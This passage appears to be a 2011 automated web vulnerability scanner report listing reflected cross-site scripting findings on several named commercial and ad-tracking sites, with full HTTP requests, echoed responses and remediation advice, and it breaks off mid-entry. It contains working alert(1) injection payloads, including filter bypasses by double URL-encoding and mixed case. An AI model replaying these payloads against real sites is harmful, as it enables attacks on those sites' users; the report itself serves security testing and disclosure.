The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 20192<img%20src%3da%20onerror%3dalert(1)>eb12297c56f was submitted in the REST URL parameter 4. This input was echoed as 20192<img src=a onerror=alert(1)>eb12297c56f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f2acb<img%20src%3da%20onerror%3dalert(1)>49a8660ab72 was submitted in the REST URL parameter 4. This input was echoed as f2acb<img src=a onerror=alert(1)>49a8660ab72 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e6e7a<img%20src%3da%20onerror%3dalert(1)>1f348ca0caf was submitted in the REST URL parameter 4. This input was echoed as e6e7a<img src=a onerror=alert(1)>1f348ca0caf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f63ce<img%20src%3da%20onerror%3dalert(1)>e2b341d8488 was submitted in the REST URL parameter 4. This input was echoed as f63ce<img src=a onerror=alert(1)>e2b341d8488 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3a29d<img%20src%3da%20onerror%3dalert(1)>a56e65f57ee was submitted in the REST URL parameter 4. This input was echoed as 3a29d<img src=a onerror=alert(1)>a56e65f57ee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ff049<img%20src%3da%20onerror%3dalert(1)>c45d55c3386 was submitted in the REST URL parameter 4. This input was echoed as ff049<img src=a onerror=alert(1)>c45d55c3386 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 691ad<img%20src%3da%20onerror%3dalert(1)>a0b7801804b was submitted in the REST URL parameter 4. This input was echoed as 691ad<img src=a onerror=alert(1)>a0b7801804b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 89349<img%20src%3da%20onerror%3dalert(1)>9970b79041e was submitted in the REST URL parameter 4. This input was echoed as 89349<img src=a onerror=alert(1)>9970b79041e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3780a<img%20src%3da%20onerror%3dalert(1)>ccf1da0184c was submitted in the REST URL parameter 4. This input was echoed as 3780a<img src=a onerror=alert(1)>ccf1da0184c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d7ade<img%20src%3da%20onerror%3dalert(1)>4de0d6e3704 was submitted in the REST URL parameter 4. This input was echoed as d7ade<img src=a onerror=alert(1)>4de0d6e3704 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c69de<img%20src%3da%20onerror%3dalert(1)>5ff80bd38ea was submitted in the REST URL parameter 4. This input was echoed as c69de<img src=a onerror=alert(1)>5ff80bd38ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ea396<img%20src%3da%20onerror%3dalert(1)>d92755f1b81 was submitted in the REST URL parameter 4. This input was echoed as ea396<img src=a onerror=alert(1)>d92755f1b81 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5e9f0<img%20src%3da%20onerror%3dalert(1)>14d7556acda was submitted in the REST URL parameter 4. This input was echoed as 5e9f0<img src=a onerror=alert(1)>14d7556acda in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f8436<img%20src%3da%20onerror%3dalert(1)>4a18df611cd was submitted in the REST URL parameter 4. This input was echoed as f8436<img src=a onerror=alert(1)>4a18df611cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload abd28<img%20src%3da%20onerror%3dalert(1)>fb76b048c03 was submitted in the REST URL parameter 4. This input was echoed as abd28<img src=a onerror=alert(1)>fb76b048c03 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 63613<img%20src%3da%20onerror%3dalert(1)>843b3decd8d was submitted in the REST URL parameter 4. This input was echoed as 63613<img src=a onerror=alert(1)>843b3decd8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1e841<img%20src%3da%20onerror%3dalert(1)>53ffb31ba6d was submitted in the REST URL parameter 4. This input was echoed as 1e841<img src=a onerror=alert(1)>53ffb31ba6d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cda49<img%20src%3da%20onerror%3dalert(1)>24c3235941 was submitted in the REST URL parameter 4. This input was echoed as cda49<img src=a onerror=alert(1)>24c3235941 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4bd8f<img%20src%3da%20onerror%3dalert(1)>810f9b9d03f was submitted in the REST URL parameter 4. This input was echoed as 4bd8f<img src=a onerror=alert(1)>810f9b9d03f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8a031<img%20src%3da%20onerror%3dalert(1)>790edd74f1f was submitted in the REST URL parameter 4. This input was echoed as 8a031<img src=a onerror=alert(1)>790edd74f1f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b5e77<img%20src%3da%20onerror%3dalert(1)>a9dc4d3a216 was submitted in the REST URL parameter 4. This input was echoed as b5e77<img src=a onerror=alert(1)>a9dc4d3a216 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e8920<img%20src%3da%20onerror%3dalert(1)>4b1acf1d81f was submitted in the REST URL parameter 4. This input was echoed as e8920<img src=a onerror=alert(1)>4b1acf1d81f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 78316<img%20src%3da%20onerror%3dalert(1)>531b9306b63 was submitted in the REST URL parameter 4. This input was echoed as 78316<img src=a onerror=alert(1)>531b9306b63 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ed66a<img%20src%3da%20onerror%3dalert(1)>01914ff037f was submitted in the REST URL parameter 4. This input was echoed as ed66a<img src=a onerror=alert(1)>01914ff037f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c75cb<img%20src%3da%20onerror%3dalert(1)>ac190edb460 was submitted in the REST URL parameter 4. This input was echoed as c75cb<img src=a onerror=alert(1)>ac190edb460 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cdb4c<img%20src%3da%20onerror%3dalert(1)>714edd83976 was submitted in the REST URL parameter 4. This input was echoed as cdb4c<img src=a onerror=alert(1)>714edd83976 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 21443<img%20src%3da%20onerror%3dalert(1)>14aa5599ecd was submitted in the REST URL parameter 4. This input was echoed as 21443<img src=a onerror=alert(1)>14aa5599ecd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 789ec'%3balert(1)//afdcaa50a62 was submitted in the id parameter. This input was echoed as 789ec';alert(1)//afdcaa50a62 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c484'%3balert(1)//bfff91a0391 was submitted in the sn parameter. This input was echoed as 9c484';alert(1)//bfff91a0391 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0636"><x%20style%3dx%3aexpression(alert(1))>29427ce22fe was submitted in the REST URL parameter 2. This input was echoed as c0636"><x style=x:expression(alert(1))>29427ce22fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /find/unsubscribeCatalogs.jspc0636"><x%20style%3dx%3aexpression(alert(1))>29427ce22fe HTTP/1.1 Host: secure.bhphotovideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!--<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">-->
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2181%253c%252fscript%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253e25aed6d8538 was submitted in the REST URL parameter 2. This input was echoed as c2181</script><ScRiPt>alert(1)</ScRiPt>25aed6d8538 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /find/unsubscribeCatalogs.jspc2181%253c%252fscript%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253e25aed6d8538 HTTP/1.1 Host: secure.bhphotovideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!--<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">-->
The value of the rg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7aa20"><script>alert(1)</script>cc8bc4a943f was submitted in the rg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the divID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47aa5'%3balert(1)//d192276b303 was submitted in the divID parameter. This input was echoed as 47aa5';alert(1)//d192276b303 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Fri, 30 Sep 2011 12:25:01 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 19730
function staticButton(objName,divID,buttonName,buttonId,config,state,butHtmlTemplate,server,site,protocol,servlet,windowWidth,windowHeight){this.CHAT=1;this.VOICE=2;this.BUTTON=1;this.CHATBOX=2;this.T ...[SNIP]... ic)=='undefined') {var lpMTagStatic={};} lpMTagStatic.lpStaticBut13173855011244548345561002503597 = new staticButton('lpMTagStatic.lpStaticBut13173855011244548345561002503597','lpButDivID-130512871949847aa5';alert(1)//d192276b303','Judes Images',12,{'id':12,'name':"Judes Images",chanel:1,enabled:true,buttonType:1,voiceType:-1,stickyType:1,description:"Static Button",buttonContent:2,addTextToButton:false,addTextToButtonText:"Ou ...[SNIP]...
3.346. http://smartparents.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://smartparents.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be38f"><script>alert(1)</script>d5558ed912f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?be38f"><script>alert(1)</script>d5558ed912f=1 HTTP/1.1 Host: smartparents.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp?c1=6&c2=268 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
3.347. http://smartparents.com/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://smartparents.com
Path: /favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83413"><script>alert(1)</script>6c884ff98b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.ico?83413"><script>alert(1)</script>6c884ff98b=1 HTTP/1.1 Host: smartparents.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the var request parameter is copied into the HTML document as plain text between tags. The payload db541<script>alert(1)</script>b2102473944 was submitted in the var parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service/api?method=liveclicker.widget.getList&account_id=311&&extra_options=%7B%22ttl%22%3A%223600%22%7D&dim10=1&order=random&status=online&format=json&var=liveclicker.api_res[0]db541<script>alert(1)</script>b2102473944 HTTP/1.1 Host: sv.liveclicker.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 30 Sep 2011 12:05:52 GMT Server: Apache-Coyote/1.1 Vary: Accept-Encoding Content-Type: application/json;charset=utf-8 Connection: close Content-Length: 3688
liveclicker.api_res[0]db541<script>alert(1)</script>b2102473944 = { "widgets" : { "widget" : [ { "widget_id" : "16997", "asset_id" : "28930", "versionNumber" : "1", "title" : "Choosing the Right Home for Your Bird", "length" : "1:13", "rating" : "0", "views" : "15 ...[SNIP]...
The value of the div_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload afae6'%3balert(1)//c977e495a0 was submitted in the div_id parameter. This input was echoed as afae6';alert(1)//c977e495a0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /service/getEmbed?client_id=311&widget_id=16411&player_custom_id=479&width=210&height=158&div_id=cont_mediaplayer_16411afae6'%3balert(1)//c977e495a0 HTTP/1.1 Host: sv.liveclicker.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var xml_16411={"roll_campaign_id": "295", "prerolls": [{ "skip_label": "", "location": "http://hcdn.liveclicker.net/z7a3u7c3/cds/videos/311/33073_1_Flv_320x180_h264.flv", "asset" : "33073-1", "fullscr ...[SNIP]... .split('|'),0,{}));var flashVars_16411; var e=document.createElement('div'); e.id='Liveclicker_video_16411'; e.setAttribute('class','Liveclicker_video'); document.getElementById('cont_mediaplayer_16411afae6';alert(1)//c977e495a0').appendChild(e); function lcwrite_16411() {flashVars_16411 = new Object(); var f_e = ['skinPath','petcebto','accountid',311,'urlaccount','http://www.petco.com','urllogo','http://www.petco.com','accou ...[SNIP]...
3.350. http://sv.liveclicker.net/service/getEmbed [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://sv.liveclicker.net
Path: /service/getEmbed
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 627f5"%3balert(1)//8807ffa17c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 627f5";alert(1)//8807ffa17c4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /service/getEmbed?client_id=311&widget_id=18811&width=275&height=190&player_custom_id=429&627f5"%3balert(1)//8807ffa17c4=1 HTTP/1.1 Host: sv.liveclicker.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the player_custom_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a64df"%3balert(1)//9118063e94 was submitted in the player_custom_id parameter. This input was echoed as a64df";alert(1)//9118063e94 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /service/getEmbed?client_id=311&widget_id=18811&width=275&height=190&player_custom_id=429a64df"%3balert(1)//9118063e94 HTTP/1.1 Host: sv.liveclicker.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the ckc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87e4e"><script>alert(1)</script>d5d9a5d69c was submitted in the ckc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /webrec/wr.do?client=ARMANIEXCHANGE&sessionId=520E7931-C882-5A58-0CA3-DD8D145EC0E2&ns=1&pt=hcat&categoryname=Womens&ckc=87e4e"><script>alert(1)</script>d5d9a5d69c&mbcc=4F3F8B20-763A-5480-90F3-DFE588224975&lang=en&v=5.0.0&mbts=1317384195289&rf=http%3A%2F%2Fwww.mcafeesecure.com%2Fus%2Fforconsumers%2Fmcafee_certified_sites.jsp&purl=http%3A%2F%2Fwww.armaniexchange.com%2Fcategory%2Fwomens.do HTTP/1.1 Host: t.p.mybuys.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.armaniexchange.com/category/womens.do Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 30 Sep 2011 12:04:24 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Set-Cookie: mbc=""; Domain=.mybuys.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: mbc=i8BaIcPB1wtpmTbFALn6DFkrUKTUrOK/PzhQOKdQFqqgYQmdVeghIQesor0qSXa4LI+57IlYpCk=; Domain=.mybuys.com; Expires=Wed, 18-Oct-2079 15:18:31 GMT; Path=/ Vary: Accept-Encoding P3P: CP="DSP CAO DEVo TAI PSD IVDo IVAo CONo HISo CUR PSA OUR IND NAV COM UNI INT", policyref="/w3c/p3p.xml" Accept-Ranges: bytes Cache-Control: no-store Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT x-cdn: Cotendo Connection: Keep-Alive Content-Length: 326
The value of the vti request parameter is copied into the HTML document as plain text between tags. The payload 96d62<script>alert(1)</script>d7bfbc18e73 was submitted in the vti parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /trackingAPI.js?ai=qq58S2mEuHNcyMUndnIpK+NoJdfVOT1z&evt=21&ri=13200&ii=11280&vti=YUPutwoBC2cAAAx@cYwAAAAAABOUS9tR4FyeWW96d62<script>alert(1)</script>d7bfbc18e73 HTTP/1.1 Host: ts.istrack.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://shop.mcafee.com/default.aspx Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 30 Sep 2011 12:23:09 GMT Server: Apache P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Content-Length: 114 Connection: close Content-Type: text/javascript; charset=utf-8
The value of the 320863&click request parameter is copied into the HTML document as plain text between tags. The payload 88767<script>alert(1)</script>512582641e5 was submitted in the 320863&click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?320863&click=http://adserver.adtechus.com/adlink/5330/1959687/0/225/AdId=2013056;BnId=1;itime=386884446;key=key1+key2+key3+key4;nodecode=yes;link=88767<script>alert(1)</script>512582641e5&params=386884446 HTTP/1.1 Host: voken.eyereturn.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://adserver.adtechus.com/adiframe/3.0/5330.1/1959687/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group]
Response
HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Fri, 30 Sep 2011 12:52:47 GMT Content-Type: application/x-javascript Connection: keep-alive Cache-Control: no-cache Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSAo PSDa OUR STP IND UNI COM NAV" Set-Cookie: erTok="AwAAAAB6+AQAJBcmAAgAAHv4BAAkFyYABgAA"; Domain=.eyereturn.com; Expires=Sun, 29-Sep-2013 12:52:47 GMT; Path=/ Expires: Fri, 30 Sep 2011 12:52:46 GMT Content-Length: 16715
//<!CDATA[// Copyright eyeReturn Marketing Inc., 2011, All Rights Reserved // er_CID='8793';er_SegID='320863';er_imgSrc='http://resources.eyereturn.com/8793/008793_falling_fruit40-728x90_v1.jpg';er_tokenID='325754';er_wsID='2767';er_RedirURL='http://adserver.adtechus.com/adlink/5330/1959687/0/225/AdId=2013056;BnId=1;itime=386884446;key=key1 key2 key3 key4;nodecode=yes;link=88767<script>alert(1)</script>512582641e5http://www.pcfinancial.ca/easydoesit';er_clickURL='http://adserver.adtechus.com/adlink/5330/1959687/0/225/AdId=2013056;BnId=1;itime=386884446;key=key1 key2 key3 key4;nodecode=yes;link=88767<script> ...[SNIP]...
The value of the 320863&click request parameter is copied into the HTML document as plain text between tags. The payload ccb61<script>alert(1)</script>dad60a824f6 was submitted in the 320863&click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the jsonpcallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f00ae%3balert(1)//483e73d5ace was submitted in the jsonpcallback parameter. This input was echoed as f00ae;alert(1)//483e73d5ace in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.357. http://www.abesofmaine.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.abesofmaine.com
Path: /
Issue detail
